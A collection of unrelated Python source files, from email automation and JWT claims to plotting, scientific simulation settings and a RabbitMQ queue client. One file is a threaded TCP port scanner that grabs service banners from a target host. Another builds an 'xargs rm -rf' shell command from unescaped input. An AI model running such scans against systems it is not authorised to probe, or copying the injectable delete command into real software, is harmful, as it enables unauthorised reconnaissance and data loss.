new_name='votes_total',
),
]
|
# sending emails with python
# -*- coding: utf-8 -*-
import win32com.client as win32
import psutil
import os
import subprocess
# Drafting and sending email notification to senders. You can add other senders' email in the list
def send_notification(recipient: str, textbody: str):
outlook = win32.Dispatch("Outlook.Application")
mail = outlook.CreateItem(0)
mail.To = recipient
mail.Subject = 'Certificate warnining'
mail.body = textbody
mail.send
# Open Outlook.exe. Path may vary according to system config
# Please check the path to .exe file and update below
def open_outlook():
try:
subprocess.call(['C:\Program Files (x86)\Microsoft Office\root\Office16\Outlook.exe'])
os.system("C:\Program Files (x86)\Microsoft Office\root\Office16\Outlook.exe")
except:
logging.error("Outlook didn't open successfully")
# Checking if outlook is already opened. If not, open Outlook.exe and send email
def check_and_send_mail(recipient: str, textbody: str):
# loops through all processes and breaks if outlook runs already
for item in psutil.pids():
p = psutil.Process(item)
if p.name() == "OUTLOOK.EXE":
flag = 1
break
else:
flag = 0
if (flag == 1):
send_notification(recipient, textbody)
else:
open_outlook()
send_notification(recipient, textbody)
|
from rest_framework_simplejwt.serializers import TokenObtainPairSerializer
from rest_framework_simplejwt.views import TokenObtainPairView
class CustomObtainPairSerializer(TokenObtainPairSerializer):
@classmethod
def get_token(cls, user):
token = super().get_token(user)
# Add custom claims
token['is_staff'] = user.is_staff
token['name'] = user.first_name + " " + user.last_name
return token
class CustomObtainPairView(TokenObtainPairView):
serializer_class = CustomObtainPairSerializer |
from .model import ClsModel |
import os
import sys
from multiprocessing import Process
from enum import Enum
try:
from enum import IntFlag
except:
pass
from z import getp, setp
import logging
import util
try:
class Modes(IntFlag):
none = 0
trim = 1
zoom = 2
average = 4
more = 8
change = 16
target = 32
recent = 64
multi = 128
history = 256
sort = 512
except:
pass
#bar = Modes.zoom
#bar |= Modes.average
#if Modes.zoom in bar:
# print ("so far so good")
#bar ^= Modes.zoom
#if Modes.zoom in bar:
# print ("so far so good")
class Zen(Enum):
lastStock = 0
lastMode = 1
prevAnswer = 2
#def setSettings():
def settings(setting, setValue = None, default = None):
if setValue != None:
try : settings.setdict[setting] = setValue
except :
try :
settings.setdict = getp("settings")
settings.setdict[setting] = setValue
except :
settings.setdict = dict()
settings.setdict[setting] = setValue
setp(settings.setdict, "settings")
else:
try : return settings.setdict[setting]
except :
try:
settings.setdict = getp("settings")
return settings.setdict[setting]
except: pass
return default
#print (settings(Zen.lastStock))
#settings(Zen.lastStock, 2)
#print (settings(Zen.lastStock))
# if setting == Settings.lastStock:
# return True
#
def restart_program():
"""Restarts the current program, with file objects and descriptors
cleanup
"""
try:
p = Process(os.getpid())
for handler in p.get_open_files() + p.connections():
os.close(handler.fd)
except:
pass
# logging.error(e)
python = sys.executable
os.execl(python, python, *sys.argv)
class Cursor(object):
def __init__(self, ax):
self.ax = ax
self.lx = ax.axhline(color='k') # the horiz line
self.ly = ax.axvline(color='k') # the vert line
# text location in axes coords
self.txt = ax.text(0.7, 0.9, '', transform=ax.transAxes)
def mouse_move(self, event):
if not event.inaxes:
return
x, y = event.xdata, event.ydata
# update the line positions
self.lx.set_ydata(y)
self.ly.set_xdata(x)
self.txt.set_text('x=%1.2f, y=%1.2f' % (x, y))
plt.draw()
class SnaptoCursor(object):
"""
Like Cursor but the crosshair snaps to the nearest x,y point
For simplicity, I'm assuming x is sorted
"""
def __init__(self, ax, x, y):
self.ax = ax
self.lx = ax.axhline(color='k') # the horiz line
self.ly = ax.axvline(color='k') # the vert line
self.x = x
self.y = y
# text location in axes coords
self.txt = ax.text(0.7, 0.9, '', transform=ax.transAxes)
def mouse_move(self, event):
if not event.inaxes:
return
x, y = event.xdata, event.ydata
indx = np.searchsorted(self.x, [x])[0]
x = self.x[indx]
y = self.y[indx]
# update the line positions
self.lx.set_ydata(y)
self.ly.set_xdata(x)
self.txt.set_text('x=%1.2f, y=%1.2f' % (x, y))
print('x=%1.2f, y=%1.2f' % (x, y))
plt.draw()
avgFactor = 5
def increaseAvg(add):
global avgFactor
if add:
avgFactor += 2
elif avgFactor > 4:
avgFactor -= 2
def averageValues(values):
ret = []
lastavg = 0
leng = len(values)
for i,value in enumerate(values):
end = i+avgFactor
if end < leng:
avg = round(sum(values[i:end])/float(avgFactor), 4)
else:
avg = lastavg
ret.append(avg)
lastavg = avg
return ret
def dailyAverage(opens, closes):
negs = []
davg = len(opens) - 60
davglist = []
for i,closed in enumerate(closes):
temp = closed/opens[i]
if i > davg:
davglist.append(temp)
if temp < 1:
negs.append(temp)
try:
ret1 = util.formatDecimal(sum(negs)/len(negs))
ret2 = util.formatDecimal(min(negs))
davg = util.formatDecimal(sum(davglist)/len(davglist))
return ret1, ret2, davg
except:
pass
return None, None, None
def changeValues(values, by = 5, negavg = False):
ret = []
last = 0
leng = len(values)
negs = []
for i,value in enumerate(values):
end = i+by
if end < leng:
change = round(values[end]/float(values[i]), 4)
if negavg and change < 1:
negs.append(change)
else:
change = last
ret.append(change)
last = change
if negavg:
return util.formatDecimal(sum(negs)/len(negs))
return ret
#print changeValues([i for i in range(1,40)])
#print [i for i in range(40)]
def clearDir(dirname, search = None):
path = util.getPath(dirname)
if "zen_dump" not in path:
return
try:
cmd = ""
if search:
cmd = "find {} | grep {} | xargs rm -rf".format(path, search)
else:
cmd = "find {} -type f | xargs rm -rf".format(path)
os.system(cmd)
except:
pass
def getFiles(where, his_idx = None):
import fnmatch
if getFiles.rememberedFiles:
return getFiles.rememberedFiles
holds = []
parentdir = util.getPath(where)
listOfFiles = os.listdir(parentdir)
for entry in listOfFiles:
date = entry.split("_")
try:
if len(date) < 3 or date[0] != where or \
(his_idx and int(date[1]) != his_idx) or \
"csv" not in date[2]:
continue
except:
continue
pattern = "{}*".format(where)
if fnmatch.fnmatch(entry, pattern):
getFiles.rememberedFiles.append("{}/{}".format(parentdir, entry))
getFiles.rememberedFiles.sort()
return getFiles.rememberedFiles
getFiles.rememberedFiles = []
def getNextHisSelection(increment = 1):
count = [i for i in range(3,10)]
index = count[getNextHisSelection.idx]
path = util.getPath("history/selection_standard_{}.csv".format(index))
getNextHisSelection.idx += increment
return path
getNextHisSelection.idx = 0
def getNextHis(increment = True):
try :
if increment:
getNextHis.idx += 1
elif getNextHis.idx > 0:
getNextHis.idx -= 1
ret = getFiles(where = "history")[getNextHis.idx]
if ret:
return ret
getNextHis.idx = 0
return getFiles(where = "history")[getNextHis.idx]
except:
getNextHis.idx = 0
return getFiles(where = "history")[getNextHis.idx]
return None
getNextHis.idx = 0
|
import optparse
from socket import *
from threading import *
screenLock=Semaphore(value=1)
def connScan(tgtHost,tgtPort):
try:
connSkt=socket(AF_INET,SOCK_STREAM)
connSkt.connect((tgtHost,tgtPort))
connSkt.send('Hi!')
result=connSkt.recv(100)
screenLock.acquire()
print('[+]%d/tcp open' %tgtPort)
print('[+]'+str(result))
except:
screenLock.acquire()
print('[+]%d/tcp closed' % tgtPort)
finally:
screenLock.release()
connSkt.close()
def portScann(tgtHost,tgtPort):
try:
tgtIP=gethostbyname(tgtHost)
except:
print('[-] Cannot resolve %s' %tgtHost)
return
try:
tgtName=gethostbyaddr(tgtIP)
print('\n[+] Scan results for :'+tgtName[0])
except:
print('\n[+] Scan results for :'+tgtIP)
setdefaulttimeout(1)
for Port in tgtPort:
t=Thread(target=connScan,args=(tgtHost,int(Port)))
t.start()
def main():
parser=optparse.OptionParser('Usage %prog'+'-H <targetHost> -p <taregt port>')
parser.add_option('-H',dest='tgtHost',type='string',help='specify target host')
parser.add_option('-p',dest='tgtPort',type='string',help='specify target port[s] separated by comma')
(options,args)=parser.parse_args()
tgtHost=options.tgtHost
tgtPort=str(options.tgtPort).split(',')
if (tgtHost==None)| (tgtPort[0]==None):
print(parser.usage)
exit(0)
portScann(tgtHost,tgtPort)
if __name__=="__main__":
main() |
import torch
import torch.nn as nn
import torch.nn.functional as F
def top_filtering(logits, top_k=0, top_p=0.0, filter_value=-float('Inf')):
""" Filter a distribution of logits using top-k, top-p (nucleus) and/or threshold filtering
Args:
logits: logits distribution shape (vocabulary size)
top_k: <=0: no filtering, >0: keep only top k tokens with highest probability.
top_p: <=0.0: no filtering, >0.0: keep only a subset S of candidates, where S is the smallest subset
whose total probability mass is greater than or equal to the threshold top_p.
In practice, we select the highest probability tokens whose cumulative probability mass exceeds
the threshold top_p.
"""
# batch support!
if top_k > 0:
values, _ = torch.topk(logits, top_k)
min_values = values[:, -1].unsqueeze(1).repeat(1, logits.shape[-1])
logits = torch.where(logits < min_values,
torch.ones_like(logits, dtype=logits.dtype) * -float('Inf'),
logits)
if top_p > 0.0:
# Compute cumulative probabilities of sorted tokens
sorted_logits, sorted_indices = torch.sort(logits, descending=True)
cumulative_probabilities = torch.cumsum(F.softmax(sorted_logits, dim=-1), dim=-1)
# Remove tokens with cumulative probability above the threshold
sorted_indices_to_remove = cumulative_probabilities > top_p
# Shift the indices to the right to keep also the first token above the threshold
sorted_indices_to_remove[..., 1:] = sorted_indices_to_remove[..., :-1].clone()
sorted_indices_to_remove[..., 0] = 0
sorted_logits = sorted_logits.masked_fill_(sorted_indices_to_remove, filter_value)
logits = torch.zeros_like(logits).scatter(1, sorted_indices, sorted_logits)
return logits |
import pickle
import math
import time
import numpy as np
from plotly.offline import plot
import plotly.graph_objs as go
from compute import grid_analytical_logF_conditional, sum_F_smart
from definitions import large_log_sum_array
from conditions import cond_map
def main():
# compute_count_vs_n(65536, 64)
plot_count_vs_n(65536, mode='count', regions='iarray')
#plot_count_vs_n(65536, mode='freq', regions='iarray')
#plot_count_vs_n(65536, mode='count', regions='array')
#plot_count_vs_n(65536, mode='freq', regions='array')
def counts_to_freqs(data):
data['array']['array'] -= data['max']
data['array']['bitmap'] -= data['max']
data['array']['runs'] -= data['max']
# data['iarray']['array'] -= data['max'] # this is the same object as array-array...
data['iarray']['iarray'] -= data['max']
data['iarray']['runs_iarray'] -= data['max']
data['iarray']['bitmap_iarray'] -= data['max']
def plot_count_vs_n(M, mode='count', regions='array'):
fname = 'data/count-vs-n-%s.pickle' % (M)
with open(fname, 'r') as f:
data = pickle.load(f)
title = 'Container type count vs cardinality (log scale)'
ytitle = 'Log count'
if mode == 'freq':
title = 'Container type frequency vs cardinality (log scale)'
ytitle = 'Log probability'
counts_to_freqs(data)
traces = []
c_vec = data['c']
keys = data[regions].keys()
# sort the keys for consistent trace order
for k in sorted(keys):
traces.append({'x': c_vec, 'y': data[regions][k], 'name': k})
# full view
xticks = range(0, M+1, M/8)
# zoom view
# xticks = range(0, M/8+1, M/64)
layout = go.Layout(
title=title,
xaxis={'title': 'N (cardinality)', 'tickvals': xticks, 'ticktext': map(str, xticks)},
yaxis={'title': ytitle},
)
fig = go.Figure(data=traces, layout=layout)
plot(fig, filename='figures/count-vs-n.html')
def compute_count_vs_n(M=65536, step=64):
MA, MR = 4096, 2048
c_vec = np.arange(0, M+1, step)
# add some extra values to check for sharper curve definition
# these values are just left/right of the cardinality bounds
b0 = [1, 2, 4, 65532, 65534, 65535]
b1 = [4095, 4096, 4097]
b2 = [61439, 61440, 61441]
b3 = [63487, 63488, 63489]
b4 = range(62976, 63488, 32)
c_vec = np.hstack((c_vec, b0, b1, b2, b3, b4))
c_vec.sort()
# z_array = np.zeros(c_vec.shape) # cond_map avoids having to repeat a line like this 6 times
z = {}
for ctype in cond_map:
z[ctype] = np.zeros(c_vec.shape)
def f_all(M, MA, card):
return range(0, M/2+1)
t0 = time.time()
for n, c in enumerate(c_vec):
print('%d/%d, %d (%f sec)' % (n, len(c_vec)+1, c, time.time() - t0))
# z_array[n] = sum_F_smart(M, MA, [c], f_all, array_cond_mutex(M, MA))
for ctype, cond in cond_map.items():
z[ctype][n] = sum_F_smart(M, MA, [c], f_all, cond(M, MA))
fname = 'data/count-vs-n-%s.pickle' % (M)
data = {
'c': c_vec,
'max': np.max(np.vstack((z['array'], z['bitmap'], z['runs'])), axis=0),
'array': {
'array': z['array'],
'runs': z['runs'],
'bitmap': z['bitmap'],
},
'iarray': {
'array': z['array'],
'iarray': z['iarray'],
'runs_iarray': z['runs_iarray'],
'bitmap_iarray': z['bitmap_iarray'],
},
}
with open(fname, 'w') as f:
pickle.dump(data, f)
main() |
from time import sleep
from dateutil import parser
import datetime
import database
import pytz
import json
refresh = True # for debug
frequency = 10 # in minutes
"""
Why is this file called witchdoctor?
This file is called witchdoctor because it magically
handles all of the backend data parsing.
Simply fire it up and it will magically keep the database updated!
It'll also do all the magical ranking things. Isn't it just incredible?
"""
def now():
tz = pytz.timezone('America/New_York')
return datetime.datetime.now(tz)
def timedelta(d):
try:
return now() - d
except TypeError as error:
return datetime.datetime.now() - d
def hoursago(d):
diff = timedelta(d)
return diff.seconds / 3600.0
def prettydate(d):
diff = timedelta(d)
s = diff.seconds
if diff.days > 7 or diff.days < 0:
return d.strftime('%d %b %y')
elif diff.days == 1:
return '1 day ago'
elif diff.days > 1:
return '{} days ago'.format(diff.days)
elif s < 3600:
return '< 1 hour ago'
elif s < 7200:
return '1 hour ago'
else:
return '{} hours ago'.format(s/3600)
def refresh_data():
global refresh, frequency
while True:
if refresh:
print("Refreshing the feeds!")
database.load_feeds() # database.load_feeds() also writes to data/sources.json
# Now it's time to score these stories.
print("Ranking stories....")
collection = [] # all the stories in one array
for source in database.sources_stable.iterkeys(): # build our collection array
collection.extend(database.sources_stable[source]["stories"].values())
print("Collection has " + str(len(collection)) + " stories.")
for story in collection:
time = parser.parse(story["published"])
hoursAgo = hoursago(time)
story["timeAgo"] = prettydate(time)
score = ((((story["max"] - story["index"] + 1)/story["max"])*(1+len(story["channels"])/3.0))**2)/((hoursAgo+18)/18.0)
story["score"] = score
ranked = sorted(collection, key=lambda k: k['score'])
leaning_scores = {}
for story in ranked:
print(story["source"] + ": " +story["title"] + ": " + str(story["score"]))
leaning = database.sources_stable[story["source"]]["leaning"]
if leaning in leaning_scores:
leaning_scores[leaning] += story["score"]
else:
leaning_scores[leaning] = story["score"]
for leaning in leaning_scores.keys():
print(leaning + " sum score: " + str(leaning_scores[leaning]))
print("...ranked stories, putting to data/ranked.json")
with open("data/ranked.json", "w") as output_file:
json.dump({
"ranked": ranked
}, output_file)
print("Found " + str(len(collection)) + " stories.")
sleep(60*frequency)
refresh_data()
|
import nltk
from nltk.corpus import wordnet as wn
from bs4 import BeautifulSoup
import urllib3
import html5lib
from tqdm import tqdm
def findOrigins(word):
urllib3.disable_warnings()
http = urllib3.PoolManager()
url = "http://www.dictionary.com/browse/antique"
response = http.request('GET', url)
soup = BeautifulSoup(response.data, "lxml")
ety = soup.findAll("a", {"class": "language-name"})
fin_ety = []
if len(ety) != 0:
for i in range(len(ety)):
fin_ety.append(ety[i].text)
return fin_ety
def rep(word):
return word.replace('_',' ')
words = []
for word in wn.words():
ts = rep(word)
words.append(ts)
origins = set()
for i in tqdm(range(len(words)), desc = 'Progress'):
if len(findOrigins(words[i])) != 0:
o = findOrigins(words[i])
for j in range(len(o)):
origins.add(o[j])
if i % 1000 == 0:
with open('interim_origins.txt', 'w') as f:
f.write(str(origins))
with open('origins.txt', 'w') as myFile:
myFile.write(str(origins))
|
#!/usr/bin/env python3
#
# This example shows how to run a combined fluid-kinetic simulation with
# with both the hot-tail and runaway electron grids.
#
# Run as
#
# $ ./basic.py
# $ ../../build/iface/dreami dream_settings.h5
#
# ###################################################################
import numpy as np
import sys
sys.path.append('../../py/')
from DREAM.DREAMSettings import DREAMSettings
import DREAM.Settings.Equations.IonSpecies as Ions
import DREAM.Settings.Solver as Solver
import DREAM.Settings.CollisionHandler as Collisions
import DREAM.Settings.Equations.DistributionFunction as DistFunc
import DREAM.Settings.Equations.RunawayElectrons as Runaways
import DREAM.Settings.Equations.RunawayElectronDistribution as REDist
ds = DREAMSettings()
E = 0.6 # Electric field strength (V/m)
n = 5e19 # Electron density (m^-3)
T = 1e3 # Temperature (eV)
re_enabled = True
# Set E_field
ds.eqsys.E_field.setPrescribedData(E)
# Set temperature
ds.eqsys.T_cold.setPrescribedData(T)
# Set ions
ds.eqsys.n_i.addIon(name='D', Z=1, iontype=Ions.IONS_PRESCRIBED_FULLY_IONIZED, n=n)
# Disable hot-tail grid
ds.hottailgrid.setEnabled(False)
ds.collisions.collfreq_mode = Collisions.COLLFREQ_MODE_ULTRA_RELATIVISTIC
#ds.collisions.collfreq_mode = Collisions.COLLFREQ_MODE_SUPERTHERMAL
# Set initial hot electron Maxwellian
#ds.eqsys.f_hot.setInitialProfiles(n0=2*n, T0=T)
# Include Dreicer and avalanche
ds.eqsys.n_re.setAvalanche(Runaways.AVALANCHE_MODE_FLUID)
ds.eqsys.n_re.setDreicer(Runaways.DREICER_RATE_NEURAL_NETWORK)
ds.eqsys.n_re.setInitialProfile(1e15)
# Disable runaway grid
pmax_re = 0.5
if re_enabled:
ds.runawaygrid.setNxi(50)
ds.runawaygrid.setNp(100)
ds.runawaygrid.setPmax(pmax_re)
# Use flux limiters
ds.eqsys.f_re.setAdvectionInterpolationMethod(ad_int=DistFunc.AD_INTERP_TCDF)
# Set initialization method
ds.eqsys.f_re.setInitType(REDist.INIT_ISOTROPIC)
else:
ds.runawaygrid.setEnabled(False)
# Set up radial grid
ds.radialgrid.setB0(5)
ds.radialgrid.setMinorRadius(0.22)
ds.radialgrid.setWallRadius(0.22)
ds.radialgrid.setNr(1)
# Use the linear solver
#ds.solver.setType(Solver.LINEAR_IMPLICIT)
ds.solver.setType(Solver.NONLINEAR)
ds.solver.setVerbose(True)
ds.solver.tolerance.set('j_re', reltol=1e-4)
ds.other.include('fluid')
# Set time stepper
ds.timestep.setTmax(1e-1)
ds.timestep.setNt(20)
# Save settings to HDF5 file
ds.save('dream_settings.h5')
|
"""
The rabbitpy.queue module contains two classes :py:class:`Queue` and
:py:class:`Consumer`. The :py:class:`Queue` class is an object that is used
create and work with queues on a RabbitMQ server. The :py:class:`Consumer`
contains a generator method, :py:meth:`next_message <Consumer.next_message>`
which returns messages delivered by RabbitMQ. The :py:class:`Consumer` class
should not be invoked directly, but rather by the
:py:meth:`Queue.consumer() <Queue.consumer>` method::
with conn.channel() as channel:
queue = rabbitpy.Queue(channel, 'example')
for message in queue.consume_messages():
print 'Message: %r' % message
message.ack()
"""
import contextlib
import logging
from pamqp import specification
from rabbitpy import base
from rabbitpy import utils
LOGGER = logging.getLogger(__name__)
class Queue(base.AMQPClass):
"""Create and manage RabbitMQ queues.
:param channel: The channel object to communicate on
:type channel: :py:class:`rabbitpy.channel.Channel`
:param str name: The name of the queue
:param exclusive: Queue can only be used by this channel and will
auto-delete once the channel is closed.
:type exclusive: bool
:param durable: Indicates if the queue should survive a RabbitMQ is restart
:type durable: bool
:param bool auto_delete: Automatically delete when all consumers disconnect
:param int max_length: Maximum queue length
:param int message_ttl: Time-to-live of a message in milliseconds
:param expires: Milliseconds until a queue is removed after becoming idle
:type expires: int
:param dead_letter_exchange: Dead letter exchange for rejected messages
:type dead_letter_exchange: str
:param dead_letter_routing_key: Routing key for dead lettered messages
:type dead_letter_routing_key: str
:param dict arguments: Custom arguments for the queue
"""
def __init__(self, channel, name='',
durable=True, exclusive=False, auto_delete=False,
max_length=None, message_ttl=None, expires=None,
dead_letter_exchange=None, dead_letter_routing_key=None,
arguments=None):
super(Queue, self).__init__(channel, name)
# Validate Arguments
for var, vname in [(auto_delete, 'auto_delete'), (durable, 'durable'),
(exclusive, 'exclusive')]:
if not isinstance(var, bool):
raise ValueError('%s must be True or False' % vname)
for var, vname in [(max_length, 'max_length'),
(message_ttl, 'message_ttl'), (expires, 'expires')]:
if var and not isinstance(var, int):
raise ValueError('%s must be an int' % vname)
for var, vname in [(dead_letter_exchange,
'dead_letter_exchange'),
(dead_letter_routing_key,
'dead_letter_routing_key')]:
if var and not utils.is_string(var):
raise ValueError('%s must be a str, bytes or unicode' % vname)
if arguments and not isinstance(arguments, dict()):
raise ValueError('arguments must be a dict')
# Defaults
self.consumer_tag = 'rabbitpy.%i.%s' % (self.channel.id, id(self))
self.consuming = False
# Assign Arguments
self._durable = durable
self._exclusive = exclusive
self._auto_delete = auto_delete
self._arguments = arguments or {}
self._max_length = max_length
self._message_ttl = message_ttl
self._expires = expires
self._dlx = dead_letter_exchange
self._dlr = dead_letter_routing_key
def __len__(self):
"""Return the pending number of messages in the queue by doing a passive
Queue declare.
:rtype: int
"""
response = self._rpc(self._declare(True))
return response.message_count
def bind(self, source, routing_key=None, arguments=None):
"""Bind the queue to the specified exchange or routing key.
:type source: str or :py:class:`rabbitpy.exchange.Exchange` exchange
:param source: The exchange to bind to
:param str routing_key: The routing key to use
:param dict arguments: Optional arguments for for RabbitMQ
:return: bool
"""
if hasattr(source, 'name'):
source = source.name
frame = specification.Queue.Bind(queue=self.name,
exchange=source,
routing_key=routing_key or '',
arguments=arguments)
response = self._rpc(frame)
return isinstance(response, specification.Queue.BindOk)
@contextlib.contextmanager
def consumer(self, no_ack=False, prefetch=100, priority=None):
"""Consumer message context manager, returns a consumer message
generator.
:param bool no_ack: Do not require acknowledgements
:param int prefetch: Set a prefetch count for the channel
:param int priority: Consumer priority
:rtype: :py:class:`Consumer <rabbitpy.queue.Consumer>`
"""
if prefetch is not None:
self.channel.prefetch_count(prefetch)
self.channel._consume(self, no_ack, priority)
self.consuming = True
yield Consumer(self)
def consume_messages(self, no_ack=False, prefetch=100, priority=None):
"""Consume messages from the queue as a generator:
```
for message in queue.consume_messages():
message.ack()
```
:param bool no_ack: Do not require acknowledgements
:param int prefetch: Set a prefetch count for the channel
:param int priority: Consumer priority
:rtype: :py:class:`Iterator`
"""
with self.consumer(no_ack, prefetch, priority) as consumer:
for message in consumer.next_message():
yield message
def declare(self, passive=False):
"""Declare the queue on the RabbitMQ channel passed into the
constructor, returning the current message count for the queue and
its consumer count as a tuple.
:param bool passive: Passive declare to retrieve message count and
consumer count information
:return: Message count, Consumer count
:rtype: tuple(int, int)
"""
response = self._rpc(self._declare(passive))
return response.message_count, response.consumer_count
def delete(self, if_unused=False, if_empty=False):
"""Delete the queue
:param bool if_unused: Delete only if unused
:param bool if_empty: Delete only if empty
"""
self._rpc(specification.Queue.Delete(queue=self.name,
if_unused=if_unused,
if_empty=if_empty))
def get(self, acknowledge=True):
"""Request a single message from RabbitMQ using the Basic.Get AMQP
command.
:param bool acknowledge: Let RabbitMQ know if you will manually
acknowledge or negatively acknowledge the
message after each get.
:rtype: rabbitpy.message.Message or None
"""
self._write_frame(specification.Basic.Get(queue=self.name,
no_ack=not acknowledge))
return self.channel._get_message()
def ha_declare(self, nodes=None):
"""Declare a the queue as highly available, passing in a list of nodes
the queue should live on. If no nodes are passed, the queue will be
declared across all nodes in the cluster.
:param list nodes: A list of nodes to declare. If left empty, queue
will be declared on all cluster nodes.
:return: Message count, Consumer count
:rtype: tuple(int, int)
"""
if nodes:
self._arguments['x-ha-policy'] = 'nodes'
self._arguments['x-ha-nodes'] = nodes
else:
self._arguments['x-ha-policy'] = 'all'
if 'x-ha-nodes' in self._arguments:
del self._arguments['x-ha-nodes']
return self.declare()
def purge(self):
"""Purge the queue of all of its messages."""
self._rpc(specification.Queue.Purge())
def unbind(self, source, routing_key=None):
"""Unbind queue from the specified exchange where it is bound the
routing key. If routing key is None, use the queue name.
:type source: str or :py:class:`rabbitpy.exchange.Exchange` exchange
:param source: The exchange to unbind from
:param str routing_key: The routing key that binds them
"""
if hasattr(source, 'name'):
source = source.name
self._rpc(specification.Queue.Bind(queue=self.name,
exchange=source,
routing_key=routing_key or
self.name))
def _declare(self, passive=False):
"""Return a specification.Queue.Declare class pre-composed for the rpc
method since this can be called multiple times.
:param bool passive: Passive declare to retrieve message count and
consumer count information
:rtype: pamqp.specification.Queue.Declare
"""
arguments = dict(self._arguments)
if self._expires:
arguments['x-expires'] = self._expires
if self._message_ttl:
arguments['x-message-ttl'] = self._message_ttl
if self._max_length:
arguments['x-max-length'] = self._max_length
if self._dlx:
arguments['x-dead-letter-exchange'] = self._dlx
if self._dlr:
arguments['x-dead-letter-routing-key'] = self._dlr
return specification.Queue.Declare(queue=self.name,
durable=self._durable,
passive=passive,
exclusive=self._exclusive,
auto_delete=self._auto_delete,
arguments=arguments)
class Consumer(object):
"""The Consumer class implements an interator that will retrieve the next
message from the stack of messages RabbitMQ has delivered until the client
exists the iterator. It should be used with the
:py:meth:`Queue.consumer() <rabbitpy.queue.Queue.consumer>` method which
returns a context manager for consuming.
"""
def __init__(self, queue):
self.queue = queue
def __exit__(self, exc_type, exc_val, exc_tb):
"""Called when exiting the consumer iterator
"""
self.queue.channel.rpc(self._basic_cancel)
self.queue.consuming = False
@property
def _basic_cancel(self):
return specification.Basic.Cancel(consumer_tag=self.queue.consumer_tag)
def next_message(self):
"""Retrieve the nest message from the queue as an iterator, blocking
until the next message is available.
:rtype: :py:class:`rabbitpy.message.Message`
"""
while self.queue.consuming:
yield self.queue.channel._consume_message()
|
n=int(input("Enter a limit:"))
for i in range(1,n+1):
for j in range(0,i+1):
a=i*j
if a==0:
continue
else:
print(a,end=" ")
print("\n")
|
# KVM-based Discoverable Cloudlet (KD-Cloudlet)
# Copyright (c) 2015 Carnegie Mellon University.
# All Rights Reserved.
#
# THIS SOFTWARE IS PROVIDED "AS IS," WITH NO WARRANTIES WHATSOEVER. CARNEGIE MELLON UNIVERSITY EXPRESSLY DISCLAIMS TO THE FULLEST EXTENT PERMITTEDBY LAW ALL EXPRESS, IMPLIED, AND STATUTORY WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT OF PROPRIETARY RIGHTS.
#
# Released under a modified BSD license, please see license.txt for full terms.
# DM-0002138
#
# KD-Cloudlet includes and/or makes use of the following Third-Party Software subject to their own licenses:
# MiniMongo
# Copyright (c) 2010-2014, Steve Lacy
# All rights reserved. Released under BSD license.
# https://github.com/MiniMongo/minimongo/blob/master/LICENSE
#
# Bootstrap
# Copyright (c) 2011-2015 Twitter, Inc.
# Released under the MIT License
# https://github.com/twbs/bootstrap/blob/master/LICENSE
#
# jQuery JavaScript Library v1.11.0
# http://jquery.com/
# Includes Sizzle.js
# http://sizzlejs.com/
# Copyright 2005, 2014 jQuery Foundation, Inc. and other contributors
# Released under the MIT license
# http://jquery.org/license
import socket
import os
from wifi_ska_comm import WiFiSKACommunicator, WiFiAdapter, TestAdapter
######################################################################################################################
#
######################################################################################################################
class WiFiSKAServer(object):
####################################################################################################################
#
####################################################################################################################
def __init__(self, host, port, secret, files_path, pairing_handler, adapter=WiFiAdapter(), fqdn=None):
self.device_socket = None
self.host = host
self.port = port
self.secret = secret
self.files_path = files_path
self.handler = pairing_handler
self.adapter = adapter
self.fqdn = fqdn
####################################################################################################################
# Listen on a socket and handle commands. Each connection spawns a separate thread
####################################################################################################################
def wait_for_messages(self):
adapter_name = self.adapter.get_adapter_name()
if adapter_name is None:
raise Exception("WiFi adapter not available.")
self.device_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print(self.host + '-' + str(self.port))
self.device_socket.bind((self.host, self.port))
self.device_socket.listen(1)
# Wait for a connection.
try:
print('Waiting for a connection')
data_socket, addr = self.device_socket.accept()
comm = WiFiSKACommunicator(data_socket, self.secret, local_fqdn=self.fqdn)
print('Device connected')
except Exception as e:
print('Error waiting for connections: ' + str(e))
return
except KeyboardInterrupt:
print('Stopped with Ctrl+C from user... socket will be closed')
raise
finally:
self.device_socket.close()
print('Listener socket closed.')
# Get new data until we get a final command.
try:
while True:
print('Waiting for a message')
command, message = comm.receive_command()
print "Received a message."
# If the command needs to get a file, first store it in a temp location before handling the command.
if command == "receive_file":
folder_path = self.handler.get_storage_folder_path(self.files_path, message)
if not os.path.exists(folder_path):
os.makedirs(folder_path)
comm.receive_file(message, folder_path)
# Handle the command.
return_code, return_data = self.handler.handle_incoming(command, message, self.files_path)
if return_code == 'send':
comm.send_data(return_data)
elif return_code == 'ok':
comm.send_success_reply()
elif return_code == 'transfer_complete':
comm.send_success_reply()
break
else:
comm.send_error_reply('Could not properly handle command.')
except Exception as e:
comm.send_error_reply(e.message)
######################################################################################################################
# Test handler
######################################################################################################################
class TestHandler(object):
####################################################################################################################
# Create path and folders to store the files.
####################################################################################################################
def get_storage_folder_path(self, base_path, message):
return os.path.join(base_path, message['cloudlet_name'])
####################################################################################################################
# Handle an incoming message.
####################################################################################################################
def handle_incoming(self, command, message, files_path):
print 'Handling command: ' + command
if command == 'send_data':
return 'send', ('device_id', 'pepe')
elif command == 'transfer_complete':
return command, ''
elif command == 'receive_data':
print('Command: ' + message['command'])
return 'ok', ''
elif command == "receive_file":
print('File: ' + message['file_id'])
full_path = os.path.join(self.get_storage_folder_path(files_path, message), message['file_id'])
print('File contents: ')
with open(full_path, 'r') as test_file:
print(test_file.read())
return 'ok', ''
else:
return 'error'
######################################################################################################################
# Test method
######################################################################################################################
def test():
server = WiFiSKAServer(host='127.0.0.1', port=1700, secret='secret',
files_path='./data/test', pairing_handler=TestHandler(), adapter=TestAdapter('eth0'))
server.wait_for_messages()
|
#
# Copyright The NOMAD Authors.
#
# This file is part of NOMAD. See https://nomad-lab.eu for further info.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nomad.metainfo import Section, Quantity, Package
from nomad.datamodel.metainfo.public import section_single_configuration_calculation as SCC
m_package = Package(
name='openmx_nomadmetainfo_json',
description='None')
# We extend the existing common definition of a section "single configuration calculation"
class OpenmxSCC(SCC):
